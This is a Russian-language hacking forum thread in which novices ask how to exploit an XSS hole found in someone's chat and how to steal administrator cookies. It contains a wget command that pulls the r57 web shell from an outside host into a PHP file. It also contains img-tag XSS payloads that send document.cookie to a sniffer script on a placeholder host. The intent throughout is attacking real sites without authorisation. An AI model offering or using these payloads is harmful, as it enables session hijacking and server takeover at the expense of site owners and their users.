Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
гениальный пост особенно название пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник
У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript:alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript:wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть??? Люди плиз, иначе я красным писать начну!
Охренеть........ три ответа трех мемберов с >300 почтов, а содержание "ты дурак, мы умные" Adio На будущее перед тем, как задавать вопрос, советую Вам воспользоваться поиском по форуму. Если Вы не нашли ответ на Ваш вопрос, воспользуйтесь поисковыми системами google.com или yandex.ru. Вот например полезные темы из раздела "Статьи": http://forum.antichat.ru/threadnav18872-1-10.html http://forum.antichat.ru/threadnav18719-1-10.html http://forum.antichat.ru/threadnav13949-1-10.html http://forum.antichat.ru/thread12124.html Также советую прочитать мою статью: http://www.security-teams.net/index.php?showtopic=2492
drmist, ни в коем случае. Я согласен, что не раскрыл тему. Какой вопрос - таков ответ. А ты молодец. Надеюсь создателю топика эти ссылки помогут.
Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ??? Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ?
КАк мона Стрырить Админские Кукисы ??? Заставить админа зайти на xss сраничку ? ))) Да он не дурак по ходу дела !
нет можна вставить ссылку на сниффе прям на страницу нужна прописать чета типа "<img src=javascript:window.location=http://adres-snifera>ru/>" а админу не надобудет кудалибо заходить мы ему поможем ) или прописать такое "<img src=Http://adres-sniffera.ru/snifer.cgi? +documen.cookie> последний вариан не такой палевый , зы если чето не правильна я невиноват , я новичок в скрипт кидинге.....
Обсуждать уже нечего. Уже больше похоже на обсуждение "как впарить ссылку" админу, но это уже не в этот раздел. Насчёт xss уже не знаю что можно тут сказать, проговорили уже всё. drmist ответил на вопрос, дав ссылки. Так же нужно воспользоваться поиском по форуму, и прочитать статьи на сайте античата. (как минимум) [closed]
